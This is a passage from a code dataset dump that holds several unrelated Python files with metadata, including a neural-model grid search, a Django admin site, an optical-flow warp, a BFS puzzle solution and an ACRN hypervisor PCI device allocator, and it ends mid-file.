max_stars_repo_path stringlengths 4 286 | max_stars_repo_name stringlengths 5 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.03M | content_cleaned stringlengths 6 1.03M | language stringclasses 111 values | language_score float64 0.03 1 | comments stringlengths 0 556k | edu_score float64 0.32 5.03 | edu_int_score int64 0 5 |
|---|---|---|---|---|---|---|---|---|---|---|
BasalGanglia/synaptic_transmission_fit.py | Richert/BrainNetworks | 0 | 6612351 | from pyrates.frontend import CircuitTemplate
from pyrates.utility.grid_search import grid_search
from pyrates.utility.visualization import plot_connectivity
import matplotlib.pyplot as plt
import os
import numpy as np
# parameters
dt = 5e-4
T = 50.0
start = int(10.0/dt)
stop = int(12.0/dt)
dts = 1e-2
inp = np.zeros((int(T/dt), 1))
inp[start:stop] = 1.0
# target: delayed biexponential feedback
biexp = CircuitTemplate.from_yaml("config/stn_gpe/biexp_gamma")
r1 = biexp.run(simulation_time=T, sampling_step_size=dts, inputs={'n1/biexp_rate/I_ext': inp},
outputs={'r': 'n1/biexp_rate/r'}, backend='numpy', step_size=dt, solver='euler')
# fig, ax = plt.subplots()
# ax.plot(r1['r'])
# plt.show()
# approximation: gamma-distributed feedback
param_grid = {'d': np.asarray([5.0, 6.0, 7.0]),
's': np.asarray([1.0, 1.5, 2.0])}
param_map = {'d': {'vars': ['delay'], 'edges': [('n1/biexp_rate/r2', 'n1/biexp_rate/r_in')]},
's': {'vars': ['spread'], 'edges': [('n1/biexp_rate/r2', 'n1/biexp_rate/r_in')]}}
out_var = 'n1/biexp_rate/r'
r2, r_map = grid_search("config/stn_gpe/biexp_gamma", param_grid, param_map, step_size=dt, simulation_time=T,
sampling_step_size=dts, permute_grid=True, backend='numpy', solver='euler',
outputs={'r': out_var}, inputs={'n1/biexp_rate/I_ext': inp}, clear=False)
# calculate difference between target and approximation
n = len(param_grid['d'])
m = len(param_grid['s'])
alpha = 0.95
error = np.zeros((n, m))
indices = [['_'for j in range(m)] for i in range(n)]
for idx in r_map.index:
idx_r = np.argmin(np.abs(param_grid['d'] - r_map.at[idx, 'd']))
idx_c = np.argmin(np.abs(param_grid['s'] - r_map.at[idx, 's']))
r = r2.loc[:, ('r', f"{idx}/{out_var}")]
diff = r - r1.loc[:, 'r']
d, s = r_map.loc[idx, 'd'], r_map.loc[idx, 's']
order = int(np.round((d/s)**2))
error[idx_r, idx_c] = alpha*np.sqrt(diff.T @ diff) + (1-alpha)*order
print(f"delay = {d}, spread = {s}, order = {order}, rate = {order/d}, error = {error[idx_r, idx_c]}")
indices[idx_r.squeeze()][idx_c.squeeze()] = idx
# display error
fig, ax = plt.subplots()
ax = plot_connectivity(error, xticklabels=param_grid['s'], yticklabels=param_grid['d'], ax=ax)
ax.set_xlabel('s')
ax.set_ylabel('d')
plt.tight_layout()
# display winner together with target
fig2, ax2 = plt.subplots()
winner = np.argmin(error)
idx = np.asarray(indices).flatten()[winner]
ax2.plot(r1.loc[:, 'r'])
ax2.plot(r2.loc[:, ('r', f"{idx}/{out_var}")])
plt.legend(['discrete', 'gamma'])
ax2.set_title(f"delay = {r_map.loc[idx, 'd']}, spread = {r_map.loc[idx, 's']}, error = {error.flatten()[winner]}")
plt.tight_layout()
plt.show()
| from pyrates.frontend import CircuitTemplate
from pyrates.utility.grid_search import grid_search
from pyrates.utility.visualization import plot_connectivity
import matplotlib.pyplot as plt
import os
import numpy as np
# parameters
dt = 5e-4
T = 50.0
start = int(10.0/dt)
stop = int(12.0/dt)
dts = 1e-2
inp = np.zeros((int(T/dt), 1))
inp[start:stop] = 1.0
# target: delayed biexponential feedback
biexp = CircuitTemplate.from_yaml("config/stn_gpe/biexp_gamma")
r1 = biexp.run(simulation_time=T, sampling_step_size=dts, inputs={'n1/biexp_rate/I_ext': inp},
outputs={'r': 'n1/biexp_rate/r'}, backend='numpy', step_size=dt, solver='euler')
# fig, ax = plt.subplots()
# ax.plot(r1['r'])
# plt.show()
# approximation: gamma-distributed feedback
param_grid = {'d': np.asarray([5.0, 6.0, 7.0]),
's': np.asarray([1.0, 1.5, 2.0])}
param_map = {'d': {'vars': ['delay'], 'edges': [('n1/biexp_rate/r2', 'n1/biexp_rate/r_in')]},
's': {'vars': ['spread'], 'edges': [('n1/biexp_rate/r2', 'n1/biexp_rate/r_in')]}}
out_var = 'n1/biexp_rate/r'
r2, r_map = grid_search("config/stn_gpe/biexp_gamma", param_grid, param_map, step_size=dt, simulation_time=T,
sampling_step_size=dts, permute_grid=True, backend='numpy', solver='euler',
outputs={'r': out_var}, inputs={'n1/biexp_rate/I_ext': inp}, clear=False)
# calculate difference between target and approximation
n = len(param_grid['d'])
m = len(param_grid['s'])
alpha = 0.95
error = np.zeros((n, m))
indices = [['_'for j in range(m)] for i in range(n)]
for idx in r_map.index:
idx_r = np.argmin(np.abs(param_grid['d'] - r_map.at[idx, 'd']))
idx_c = np.argmin(np.abs(param_grid['s'] - r_map.at[idx, 's']))
r = r2.loc[:, ('r', f"{idx}/{out_var}")]
diff = r - r1.loc[:, 'r']
d, s = r_map.loc[idx, 'd'], r_map.loc[idx, 's']
order = int(np.round((d/s)**2))
error[idx_r, idx_c] = alpha*np.sqrt(diff.T @ diff) + (1-alpha)*order
print(f"delay = {d}, spread = {s}, order = {order}, rate = {order/d}, error = {error[idx_r, idx_c]}")
indices[idx_r.squeeze()][idx_c.squeeze()] = idx
# display error
fig, ax = plt.subplots()
ax = plot_connectivity(error, xticklabels=param_grid['s'], yticklabels=param_grid['d'], ax=ax)
ax.set_xlabel('s')
ax.set_ylabel('d')
plt.tight_layout()
# display winner together with target
fig2, ax2 = plt.subplots()
winner = np.argmin(error)
idx = np.asarray(indices).flatten()[winner]
ax2.plot(r1.loc[:, 'r'])
ax2.plot(r2.loc[:, ('r', f"{idx}/{out_var}")])
plt.legend(['discrete', 'gamma'])
ax2.set_title(f"delay = {r_map.loc[idx, 'd']}, spread = {r_map.loc[idx, 's']}, error = {error.flatten()[winner]}")
plt.tight_layout()
plt.show()
| en | 0.549501 | # parameters # target: delayed biexponential feedback # fig, ax = plt.subplots() # ax.plot(r1['r']) # plt.show() # approximation: gamma-distributed feedback # calculate difference between target and approximation # display error # display winner together with target | 2.165322 | 2 |
assignment2/src/photogallery/tests/integration/end_to_end_test.py | rahulraj/web_projects | 1 | 6612352 | <reponame>rahulraj/web_projects
import unittest
import os.path
import shutil
from copier_test import create_directory
from ...generator.gallerygenerator import create_gallery_generator
class EndToEndTest(unittest.TestCase):
"""
This test case runs the application from start to end.
"""
def setUp(self):
# TODO get some actual jpeg files
create_directory('/tmp/fromdir')
create_directory('/tmp/fromdir/first_sub')
create_directory('/tmp/todir')
with open('/tmp/fromdir/foo.jpg', 'w') as first_jpg:
first_jpg.write('some jpeg data')
with open('/tmp/fromdir/bar.jpg', 'w') as second_jpg:
second_jpg.write('some more jpeg data')
with open('/tmp/fromdir/first_sub/baz.jpg', 'w') as third_jpg:
third_jpg.write('even more jpeg data')
with open('/tmp/fromdir/manifest.json', 'w') as json_file:
json_file.write('{}')
def disabled_test_it_should_create_html_files(self):
"""
This test needs actual JPEGs, not text files pretending to be.
"""
return
command_line_arguments = ['-i', '/tmp/fromdir', '-o', '/tmp/todir',
'-m', '/tmp/fromdir/manifest.json']
generator = create_gallery_generator(command_line_arguments)
generator.run()
self.assertTrue(os.path.isfile('/tmp/todir/foo.html'))
self.assertTrue(os.path.isfile('/tmp/todir/bar.html'))
self.assertTrue(os.path.isfile('/tmp/todir/tmp.html'))
self.assertTrue(os.path.isfile('/tmp/todir/tmp-fromdir-first_sub.html'))
self.assertTrue(os.path.isfile('/tmp/todir/baz.html'))
def tearDown(self):
shutil.rmtree('/tmp/fromdir')
shutil.rmtree('/tmp/todir')
| import unittest
import os.path
import shutil
from copier_test import create_directory
from ...generator.gallerygenerator import create_gallery_generator
class EndToEndTest(unittest.TestCase):
"""
This test case runs the application from start to end.
"""
def setUp(self):
# TODO get some actual jpeg files
create_directory('/tmp/fromdir')
create_directory('/tmp/fromdir/first_sub')
create_directory('/tmp/todir')
with open('/tmp/fromdir/foo.jpg', 'w') as first_jpg:
first_jpg.write('some jpeg data')
with open('/tmp/fromdir/bar.jpg', 'w') as second_jpg:
second_jpg.write('some more jpeg data')
with open('/tmp/fromdir/first_sub/baz.jpg', 'w') as third_jpg:
third_jpg.write('even more jpeg data')
with open('/tmp/fromdir/manifest.json', 'w') as json_file:
json_file.write('{}')
def disabled_test_it_should_create_html_files(self):
"""
This test needs actual JPEGs, not text files pretending to be.
"""
return
command_line_arguments = ['-i', '/tmp/fromdir', '-o', '/tmp/todir',
'-m', '/tmp/fromdir/manifest.json']
generator = create_gallery_generator(command_line_arguments)
generator.run()
self.assertTrue(os.path.isfile('/tmp/todir/foo.html'))
self.assertTrue(os.path.isfile('/tmp/todir/bar.html'))
self.assertTrue(os.path.isfile('/tmp/todir/tmp.html'))
self.assertTrue(os.path.isfile('/tmp/todir/tmp-fromdir-first_sub.html'))
self.assertTrue(os.path.isfile('/tmp/todir/baz.html'))
def tearDown(self):
shutil.rmtree('/tmp/fromdir')
shutil.rmtree('/tmp/todir') | en | 0.596688 | This test case runs the application from start to end. # TODO get some actual jpeg files This test needs actual JPEGs, not text files pretending to be. | 2.880946 | 3 |
tests/conftest.py | AuHau/giTrack | 5 | 6612353 | <reponame>AuHau/giTrack
import pytest
def pytest_collection_modifyitems(items):
for item in items:
if item.fspath is None:
continue
if 'integration' in str(item.fspath):
item.add_marker(pytest.mark.integration)
if 'unit' in str(item.fspath):
item.add_marker(pytest.mark.unit)
| import pytest
def pytest_collection_modifyitems(items):
for item in items:
if item.fspath is None:
continue
if 'integration' in str(item.fspath):
item.add_marker(pytest.mark.integration)
if 'unit' in str(item.fspath):
item.add_marker(pytest.mark.unit) | none | 1 | 2.475139 | 2 | |
src/augment/optical_flow/warp.py | TencentYoutuResearch/SelfSupervisedLearning-DSM | 27 | 6612354 | import cv2
import numpy as np
def warp_flow(img, flow):
h, w = flow.shape[:2]
flow = -flow
flow[:, :, 0] += np.arange(w)
flow[:, :, 1] += np.arange(h)[:, np.newaxis]
res = cv2.remap(img, flow, None, cv2.INTER_LINEAR)
return res
| import cv2
import numpy as np
def warp_flow(img, flow):
h, w = flow.shape[:2]
flow = -flow
flow[:, :, 0] += np.arange(w)
flow[:, :, 1] += np.arange(h)[:, np.newaxis]
res = cv2.remap(img, flow, None, cv2.INTER_LINEAR)
return res
| none | 1 | 2.727816 | 3 | |
src/bitcaster/config/admin.py | bitcaster-io/bitcaster | 4 | 6612355 | from collections import OrderedDict
from constance import config
from django.conf import settings
from django.contrib.admin import AdminSite
from django.contrib.admin.apps import SimpleAdminConfig
from django.core.cache import caches
from django.template.response import TemplateResponse
from django.utils.translation import gettext_lazy
from django.views.decorators.cache import never_cache
from bitcaster import get_full_version
cache = caches['default']
DEFAULT_INDEX_SECTIONS = {
'Other': [],
'_hidden_': ['sites', 'unicef_rest_framework.Application',
'oauth2_provider', 'social_django',
'django_celery_beat.PeriodicTask']
}
class BitcasterAdminSite(AdminSite):
site_title = gettext_lazy('Bitcaster')
site_header = gettext_lazy('Bitcaster administration')
@never_cache
def index(self, request, extra_context=None):
style = request.COOKIES.get('old_index_style', 0)
if style in [1, '1']:
return super(BitcasterAdminSite, self).index(request, {'index_style': 0})
else:
return self.index_new(request, {'index_style': 1})
@never_cache
def index_new(self, request, extra_context=None):
key = f'apps_groups:{request.user.id}:{get_full_version()}:{config.CACHE_VERSION}'
app_list = self.get_app_list(request)
groups = cache.get(key)
if not groups:
sections = getattr(settings, 'INDEX_SECTIONS', DEFAULT_INDEX_SECTIONS)
groups = OrderedDict([(k, []) for k in sections.keys()])
def get_section(model, app):
fqn = '%s.%s' % (app['app_label'], model['object_name'])
target = 'Other'
if fqn in sections['_hidden_'] or app['app_label'] in sections['_hidden_']:
return '_hidden_'
for sec, models in sections.items():
if fqn in models:
return sec
elif app['app_label'] in models:
target = sec
return target
for app in app_list:
for model in app['models']:
sec = get_section(model, app)
groups[sec].append(
{'app_label': str(app['app_label']),
'app_name': str(app['name']),
'app_url': app['app_url'],
'label': '%s - %s' % (app['name'], model['object_name']),
'model_name': str(model['name']),
'admin_url': model['admin_url'],
'perms': model['perms']})
for __, models in groups.items():
models.sort(key=lambda x: x['label'])
cache.set(key, groups, 60 * 60)
context = {
**self.each_context(request),
# 'title': self.index_title,
'app_list': app_list,
'groups': dict(groups),
**(extra_context or {}),
}
request.current_app = self.name
return TemplateResponse(request, 'admin/index_new.html', context)
class AdminConfig(SimpleAdminConfig):
"""The default AppConfig for admin which does autodiscovery."""
default_site = 'etools_datamart.config.admin.DatamartAdminSite'
def ready(self):
super().ready()
self.module.autodiscover()
| from collections import OrderedDict
from constance import config
from django.conf import settings
from django.contrib.admin import AdminSite
from django.contrib.admin.apps import SimpleAdminConfig
from django.core.cache import caches
from django.template.response import TemplateResponse
from django.utils.translation import gettext_lazy
from django.views.decorators.cache import never_cache
from bitcaster import get_full_version
cache = caches['default']
DEFAULT_INDEX_SECTIONS = {
'Other': [],
'_hidden_': ['sites', 'unicef_rest_framework.Application',
'oauth2_provider', 'social_django',
'django_celery_beat.PeriodicTask']
}
class BitcasterAdminSite(AdminSite):
site_title = gettext_lazy('Bitcaster')
site_header = gettext_lazy('Bitcaster administration')
@never_cache
def index(self, request, extra_context=None):
style = request.COOKIES.get('old_index_style', 0)
if style in [1, '1']:
return super(BitcasterAdminSite, self).index(request, {'index_style': 0})
else:
return self.index_new(request, {'index_style': 1})
@never_cache
def index_new(self, request, extra_context=None):
key = f'apps_groups:{request.user.id}:{get_full_version()}:{config.CACHE_VERSION}'
app_list = self.get_app_list(request)
groups = cache.get(key)
if not groups:
sections = getattr(settings, 'INDEX_SECTIONS', DEFAULT_INDEX_SECTIONS)
groups = OrderedDict([(k, []) for k in sections.keys()])
def get_section(model, app):
fqn = '%s.%s' % (app['app_label'], model['object_name'])
target = 'Other'
if fqn in sections['_hidden_'] or app['app_label'] in sections['_hidden_']:
return '_hidden_'
for sec, models in sections.items():
if fqn in models:
return sec
elif app['app_label'] in models:
target = sec
return target
for app in app_list:
for model in app['models']:
sec = get_section(model, app)
groups[sec].append(
{'app_label': str(app['app_label']),
'app_name': str(app['name']),
'app_url': app['app_url'],
'label': '%s - %s' % (app['name'], model['object_name']),
'model_name': str(model['name']),
'admin_url': model['admin_url'],
'perms': model['perms']})
for __, models in groups.items():
models.sort(key=lambda x: x['label'])
cache.set(key, groups, 60 * 60)
context = {
**self.each_context(request),
# 'title': self.index_title,
'app_list': app_list,
'groups': dict(groups),
**(extra_context or {}),
}
request.current_app = self.name
return TemplateResponse(request, 'admin/index_new.html', context)
class AdminConfig(SimpleAdminConfig):
"""The default AppConfig for admin which does autodiscovery."""
default_site = 'etools_datamart.config.admin.DatamartAdminSite'
def ready(self):
super().ready()
self.module.autodiscover()
| en | 0.60593 | # 'title': self.index_title, The default AppConfig for admin which does autodiscovery. | 1.8174 | 2 |
BOJ2667.py | INYEONGKIM/BOJ | 2 | 6612356 | <filename>BOJ2667.py
n=int(input());g=[list(input()) for _ in range(n)]
def bfs(i,j):
q=__import__('collections').deque()
q.append((i,j))
c=0
while q:
x,y=q.popleft()
if 0<=x-1 and g[x-1][y]=='1':
q.append((x-1,y))
g[x-1][y]='0'
if x+1<n and g[x+1][y]=='1':
q.append((x+1,y))
g[x+1][y]='0'
if 0<=y-1 and g[x][y-1]=='1':
q.append((x,y-1))
g[x][y-1]='0'
if y+1<n and g[x][y+1]=='1':
q.append((x,y+1))
g[x][y+1]='0'
c+=1
if c==1: return 1
else: return c-1
tot=0;r="";a=[]
for i in range(n):
for j in range(n):
if g[i][j]=='1':
tot+=1;a.append(bfs(i,j))
r+=str(len(a))+'\n';a.sort()
r+='\n'.join(map(str,a))
print(r)
| <filename>BOJ2667.py
n=int(input());g=[list(input()) for _ in range(n)]
def bfs(i,j):
q=__import__('collections').deque()
q.append((i,j))
c=0
while q:
x,y=q.popleft()
if 0<=x-1 and g[x-1][y]=='1':
q.append((x-1,y))
g[x-1][y]='0'
if x+1<n and g[x+1][y]=='1':
q.append((x+1,y))
g[x+1][y]='0'
if 0<=y-1 and g[x][y-1]=='1':
q.append((x,y-1))
g[x][y-1]='0'
if y+1<n and g[x][y+1]=='1':
q.append((x,y+1))
g[x][y+1]='0'
c+=1
if c==1: return 1
else: return c-1
tot=0;r="";a=[]
for i in range(n):
for j in range(n):
if g[i][j]=='1':
tot+=1;a.append(bfs(i,j))
r+=str(len(a))+'\n';a.sort()
r+='\n'.join(map(str,a))
print(r)
| none | 1 | 3.167658 | 3 | |
misc/config_tools/static_allocators/bdf.py | tnishiok/acrn-hypervisor | 0 | 6612357 | <gh_stars>0
#!/usr/bin/env python3
#
# Copyright (C) 2021 Intel Corporation.
#
# SPDX-License-Identifier: BSD-3-Clause
#
import sys, os, re
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', 'library'))
import common, lib.error, lib.lib
from collections import namedtuple
# Constants for device name prefix
IVSHMEM = "IVSHMEM"
VUART = "VUART"
PTDEV = "PTDEV"
# Exception bdf list
# Some hardware drivers' bdf is hardcoded, the bdf cannot be changed even it is passtrhough devices.
HARDCODED_BDF_LIST = ["00:0e.0"]
class BusDevFunc(namedtuple(
"BusDevFunc", [
"bus",
"dev",
"func"])):
PATTERN = re.compile(r"(?P<bus>[0-9a-f]{2}):(?P<dev>[0-9a-f]{2})\.(?P<func>[0-7]{1})")
@classmethod
def from_str(cls, value):
if not(isinstance(value, str)):
raise ValueError("value must be a str: {}".format(type(value)))
match = cls.PATTERN.fullmatch(value)
if match:
return BusDevFunc(
bus=int(match.group("bus"), 16),
dev=int(match.group("dev"), 16),
func=int(match.group("func"), 16))
else:
raise ValueError("not a bdf: {!r}".format(value))
def __init__(self, *args, **kwargs):
if not (0x00 <= self.bus <= 0xff):
raise ValueError(f"Invalid bus number (0x00 ~ 0xff): {self.bus:#04x}")
if not (0x00 <= self.dev <= 0x1f):
raise ValueError(f"Invalid device number (0x00 ~ 0x1f): {self.dev:#04x}")
if not (0x0 <= self.func <= 0x7):
raise ValueError(f"Invalid function number (0 ~ 7): {self.func:#x}")
def __str__(self):
return f"{self.bus:02x}:{self.dev:02x}.{self.func:x}"
def __repr__(self):
return "BusDevFunc.from_str({!r})".format(str(self))
def find_unused_bdf(used_bdf):
# never assign 0:00.0 to any emulated devices, it's reserved for pci hostbridge
for dev in range(0x1, 0x20):
bdf = BusDevFunc(bus=0x00, dev=dev, func=0x0)
if all((bdf.dev != in_use_bdf.dev for in_use_bdf in used_bdf)):
return bdf
raise lib.error.ResourceError(f"Cannot find free bdf, used bdf: {sorted(used_bdf)}")
def insert_vuart_to_dev_dict(scenario_etree, devdict, used):
console_vuart = scenario_etree.xpath(f"./console_vuart[base != 'INVALID_PCI_BASE']/@id")
communication_vuarts = scenario_etree.xpath(f".//communication_vuart[base != 'INVALID_PCI_BASE']/@id")
for vuart_id in console_vuart:
free_bdf = find_unused_bdf(used)
devdict[f"{VUART}_{vuart_id}"] = free_bdf
used.append(free_bdf)
for vuart_id in communication_vuarts:
free_bdf = find_unused_bdf(used)
devdict[f"{VUART}_{vuart_id}"] = free_bdf
used.append(free_bdf)
def insert_ivsheme_to_dev_dict(scenario_etree, devdict, vm_id, used):
shmem_regions = lib.lib.get_shmem_regions(scenario_etree)
if vm_id not in shmem_regions:
return
shmems = shmem_regions.get(vm_id)
for shm in shmems.values():
free_bdf = find_unused_bdf(used)
devdict[f"{IVSHMEM}_{shm.get('id')}"] = free_bdf
used.append(free_bdf)
def insert_pt_devs_to_dev_dict(vm_node_etree, devdict, used):
"""
Assign an unused bdf to each of passtrhough devices.
If a passtrhough device's bdf is in the list of HARDCODED_BDF_LIST, this device should apply the same bdf as native one.
Calls find_unused_bdf to assign an unused bdf for the rest of passtrhough devices except the ones in HARDCODED_BDF_LIST.
"""
pt_devs = vm_node_etree.xpath(f".//pci_dev/text()")
# assign the bdf of the devices in HARDCODED_BDF_LIST
for pt_dev in pt_devs:
bdf_string = pt_dev.split()[0]
if bdf_string in HARDCODED_BDF_LIST:
bdf = BusDevFunc.from_str(bdf_string)
dev_name = f"{PTDEV}_{bdf.bus:#04x}_{((bdf.dev << 16) | bdf.func):#08x}".upper()
devdict[dev_name] = bdf
used.append(bdf)
# remove the pt_dev nodes which are in HARDCODED_BDF_LIST
pt_devs = [pt_dev for pt_dev in pt_devs if BusDevFunc.from_str(bdf_string) not in used]
# call find_unused_bdf to assign an unused bdf for other passthrough devices except the ones in HARDCODED_BDF_LIST
for pt_dev in pt_devs:
bdf = BusDevFunc.from_str(pt_dev.split()[0])
free_bdf = find_unused_bdf(used)
dev_name = f"{PTDEV}_{bdf.bus:#04x}_{((bdf.dev << 16) | bdf.func):#08x}".upper()
devdict[dev_name] = free_bdf
used.append(free_bdf)
def get_devs_bdf_native(board_etree):
"""
Get all pci devices' bdf in native environment.
return: list of pci devices' bdf
"""
nodes = board_etree.xpath(f"//bus[@type = 'pci' and @id]/device[@address]")
dev_list = []
for node in nodes:
address = node.get('address')
bus = int(common.get_node("../@address", node), 16)
dev = int(address, 16) >> 16
func = int(address, 16) & 0xffff
dev_list.append(BusDevFunc(bus = bus, dev = dev, func = func))
return dev_list
def get_devs_bdf_passthrough(scenario_etree):
"""
Get all pre-launched vms' passthrough devices' bdf in native environment.
return: list of passtrhough devices' bdf.
"""
dev_list = []
for vm_type in lib.lib.PRE_LAUNCHED_VMS_TYPE:
pt_devs = scenario_etree.xpath(f"//vm[vm_type = '{vm_type}']/pci_devs/pci_dev/text()")
for pt_dev in pt_devs:
bdf = BusDevFunc.from_str(pt_dev.split()[0])
dev_list.append(bdf)
return dev_list
def create_device_node(allocation_etree, vm_id, devdict):
for dev in devdict:
dev_name = dev
bdf = devdict.get(dev)
vm_node = common.get_node(f"/acrn-config/vm[@id = '{vm_id}']", allocation_etree)
if vm_node is None:
vm_node = common.append_node("/acrn-config/vm", None, allocation_etree, id = vm_id)
dev_node = common.get_node(f"./device[@name = '{dev_name}']", vm_node)
if dev_node is None:
dev_node = common.append_node("./device", None, vm_node, name = dev_name)
if common.get_node(f"./bus", dev_node) is None:
common.append_node(f"./bus", f"{bdf.bus:#04x}".upper(), dev_node)
if common.get_node(f"./dev", dev_node) is None:
common.append_node(f"./dev", f"{bdf.dev:#04x}".upper(), dev_node)
if common.get_node(f"./func", dev_node) is None:
common.append_node(f"./func", f"{bdf.func:#04x}".upper(), dev_node)
def fn(board_etree, scenario_etree, allocation_etree):
vm_nodes = scenario_etree.xpath("//vm")
for vm_node in vm_nodes:
vm_id = vm_node.get('id')
devdict = {}
used = []
vm_type = common.get_node("./vm_type/text()", vm_node)
if vm_type is not None and lib.lib.is_post_launched_vm(vm_type):
continue
if vm_type is not None and lib.lib.is_sos_vm(vm_type):
native_used = get_devs_bdf_native(board_etree)
passthrough_used = get_devs_bdf_passthrough(scenario_etree)
used = [bdf for bdf in native_used if bdf not in passthrough_used]
if common.get_node("//@board", scenario_etree) == "tgl-rvp":
used.append(BusDevFunc(bus = 0, dev = 1, func = 0))
insert_vuart_to_dev_dict(vm_node, devdict, used)
insert_ivsheme_to_dev_dict(scenario_etree, devdict, vm_id, used)
insert_pt_devs_to_dev_dict(vm_node, devdict, used)
create_device_node(allocation_etree, vm_id, devdict)
| #!/usr/bin/env python3
#
# Copyright (C) 2021 Intel Corporation.
#
# SPDX-License-Identifier: BSD-3-Clause
#
import sys, os, re
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', 'library'))
import common, lib.error, lib.lib
from collections import namedtuple
# Constants for device name prefix
IVSHMEM = "IVSHMEM"
VUART = "VUART"
PTDEV = "PTDEV"
# Exception bdf list
# Some hardware drivers' bdf is hardcoded, the bdf cannot be changed even it is passtrhough devices.
HARDCODED_BDF_LIST = ["00:0e.0"]
class BusDevFunc(namedtuple(
"BusDevFunc", [
"bus",
"dev",
"func"])):
PATTERN = re.compile(r"(?P<bus>[0-9a-f]{2}):(?P<dev>[0-9a-f]{2})\.(?P<func>[0-7]{1})")
@classmethod
def from_str(cls, value):
if not(isinstance(value, str)):
raise ValueError("value must be a str: {}".format(type(value)))
match = cls.PATTERN.fullmatch(value)
if match:
return BusDevFunc(
bus=int(match.group("bus"), 16),
dev=int(match.group("dev"), 16),
func=int(match.group("func"), 16))
else:
raise ValueError("not a bdf: {!r}".format(value))
def __init__(self, *args, **kwargs):
if not (0x00 <= self.bus <= 0xff):
raise ValueError(f"Invalid bus number (0x00 ~ 0xff): {self.bus:#04x}")
if not (0x00 <= self.dev <= 0x1f):
raise ValueError(f"Invalid device number (0x00 ~ 0x1f): {self.dev:#04x}")
if not (0x0 <= self.func <= 0x7):
raise ValueError(f"Invalid function number (0 ~ 7): {self.func:#x}")
def __str__(self):
return f"{self.bus:02x}:{self.dev:02x}.{self.func:x}"
def __repr__(self):
return "BusDevFunc.from_str({!r})".format(str(self))
def find_unused_bdf(used_bdf):
# never assign 0:00.0 to any emulated devices, it's reserved for pci hostbridge
for dev in range(0x1, 0x20):
bdf = BusDevFunc(bus=0x00, dev=dev, func=0x0)
if all((bdf.dev != in_use_bdf.dev for in_use_bdf in used_bdf)):
return bdf
raise lib.error.ResourceError(f"Cannot find free bdf, used bdf: {sorted(used_bdf)}")
def insert_vuart_to_dev_dict(scenario_etree, devdict, used):
console_vuart = scenario_etree.xpath(f"./console_vuart[base != 'INVALID_PCI_BASE']/@id")
communication_vuarts = scenario_etree.xpath(f".//communication_vuart[base != 'INVALID_PCI_BASE']/@id")
for vuart_id in console_vuart:
free_bdf = find_unused_bdf(used)
devdict[f"{VUART}_{vuart_id}"] = free_bdf
used.append(free_bdf)
for vuart_id in communication_vuarts:
free_bdf = find_unused_bdf(used)
devdict[f"{VUART}_{vuart_id}"] = free_bdf
used.append(free_bdf)
def insert_ivsheme_to_dev_dict(scenario_etree, devdict, vm_id, used):
shmem_regions = lib.lib.get_shmem_regions(scenario_etree)
if vm_id not in shmem_regions:
return
shmems = shmem_regions.get(vm_id)
for shm in shmems.values():
free_bdf = find_unused_bdf(used)
devdict[f"{IVSHMEM}_{shm.get('id')}"] = free_bdf
used.append(free_bdf)
def insert_pt_devs_to_dev_dict(vm_node_etree, devdict, used):
"""
Assign an unused bdf to each of passtrhough devices.
If a passtrhough device's bdf is in the list of HARDCODED_BDF_LIST, this device should apply the same bdf as native one.
Calls find_unused_bdf to assign an unused bdf for the rest of passtrhough devices except the ones in HARDCODED_BDF_LIST.
"""
pt_devs = vm_node_etree.xpath(f".//pci_dev/text()")
# assign the bdf of the devices in HARDCODED_BDF_LIST
for pt_dev in pt_devs:
bdf_string = pt_dev.split()[0]
if bdf_string in HARDCODED_BDF_LIST:
bdf = BusDevFunc.from_str(bdf_string)
dev_name = f"{PTDEV}_{bdf.bus:#04x}_{((bdf.dev << 16) | bdf.func):#08x}".upper()
devdict[dev_name] = bdf
used.append(bdf)
# remove the pt_dev nodes which are in HARDCODED_BDF_LIST
pt_devs = [pt_dev for pt_dev in pt_devs if BusDevFunc.from_str(bdf_string) not in used]
# call find_unused_bdf to assign an unused bdf for other passthrough devices except the ones in HARDCODED_BDF_LIST
for pt_dev in pt_devs:
bdf = BusDevFunc.from_str(pt_dev.split()[0])
free_bdf = find_unused_bdf(used)
dev_name = f"{PTDEV}_{bdf.bus:#04x}_{((bdf.dev << 16) | bdf.func):#08x}".upper()
devdict[dev_name] = free_bdf
used.append(free_bdf)
def get_devs_bdf_native(board_etree):
"""
Get all pci devices' bdf in native environment.
return: list of pci devices' bdf
"""
nodes = board_etree.xpath(f"//bus[@type = 'pci' and @id]/device[@address]")
dev_list = []
for node in nodes:
address = node.get('address')
bus = int(common.get_node("../@address", node), 16)
dev = int(address, 16) >> 16
func = int(address, 16) & 0xffff
dev_list.append(BusDevFunc(bus = bus, dev = dev, func = func))
return dev_list
def get_devs_bdf_passthrough(scenario_etree):
"""
Get all pre-launched vms' passthrough devices' bdf in native environment.
return: list of passtrhough devices' bdf.
"""
dev_list = []
for vm_type in lib.lib.PRE_LAUNCHED_VMS_TYPE:
pt_devs = scenario_etree.xpath(f"//vm[vm_type = '{vm_type}']/pci_devs/pci_dev/text()")
for pt_dev in pt_devs:
bdf = BusDevFunc.from_str(pt_dev.split()[0])
dev_list.append(bdf)
return dev_list
def create_device_node(allocation_etree, vm_id, devdict):
for dev in devdict:
dev_name = dev
bdf = devdict.get(dev)
vm_node = common.get_node(f"/acrn-config/vm[@id = '{vm_id}']", allocation_etree)
if vm_node is None:
vm_node = common.append_node("/acrn-config/vm", None, allocation_etree, id = vm_id)
dev_node = common.get_node(f"./device[@name = '{dev_name}']", vm_node)
if dev_node is None:
dev_node = common.append_node("./device", None, vm_node, name = dev_name)
if common.get_node(f"./bus", dev_node) is None:
common.append_node(f"./bus", f"{bdf.bus:#04x}".upper(), dev_node)
if common.get_node(f"./dev", dev_node) is None:
common.append_node(f"./dev", f"{bdf.dev:#04x}".upper(), dev_node)
if common.get_node(f"./func", dev_node) is None:
common.append_node(f"./func", f"{bdf.func:#04x}".upper(), dev_node)
def fn(board_etree, scenario_etree, allocation_etree):
vm_nodes = scenario_etree.xpath("//vm")
for vm_node in vm_nodes:
vm_id = vm_node.get('id')
devdict = {}
used = []
vm_type = common.get_node("./vm_type/text()", vm_node)
if vm_type is not None and lib.lib.is_post_launched_vm(vm_type):
continue
if vm_type is not None and lib.lib.is_sos_vm(vm_type):
native_used = get_devs_bdf_native(board_etree)
passthrough_used = get_devs_bdf_passthrough(scenario_etree)
used = [bdf for bdf in native_used if bdf not in passthrough_used]
if common.get_node("//@board", scenario_etree) == "tgl-rvp":
